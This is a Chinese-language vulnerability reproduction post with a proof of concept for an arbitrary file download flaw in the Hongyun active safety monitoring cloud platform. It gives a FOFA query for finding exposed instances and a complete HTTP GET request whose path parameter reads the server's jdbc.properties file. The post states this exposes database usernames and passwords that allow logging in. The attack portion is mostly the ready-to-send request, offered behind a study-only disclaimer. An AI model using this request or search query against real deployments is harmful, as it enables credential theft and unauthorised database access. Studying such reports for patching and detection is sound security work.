鴻運主動安全監(jiān)控云平臺任意文件下載漏洞復現(xiàn) [附POC]

0x01 前言

免責聲明：請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負責，所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學習用途使用！！！

0x02 漏洞描述

監(jiān)控云平臺實現(xiàn)對計算資源、存儲資源、網(wǎng)絡資源、云應用服務進行7*24小時全時區(qū)、多地域、全方位、立體式、智能化的IT運維監(jiān)控，保障IT系統(tǒng)安全、穩(wěn)定、可靠運行。
深圳市強鴻電子有限公司鴻運主動安全監(jiān)控云平臺存在任意文件下載漏洞，攻擊者可通過此漏洞獲得登錄賬號密碼，以進行后續(xù)測試。

0x03 影響版本

鴻運主動安全監(jiān)控云平臺

0x04 漏洞環(huán)境

FOFA語法：body=“./open/webApi.html”

0x05 漏洞復現(xiàn)

1.訪問漏洞環(huán)境

2.構(gòu)造POC

POC （GET）

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh; style=1; maintitle=%u5317%u6597%u89C6%u9891%u8FD0%u8425%u5E73%u53F0; JSESSIONID=1B2F4E6550CE07CBA9EBE5533B00AE05
Connection: close

3.復現(xiàn)

可以發(fā)現(xiàn)數(shù)據(jù)的賬戶以及密碼，可以進行登錄連接數(shù)據(jù)庫。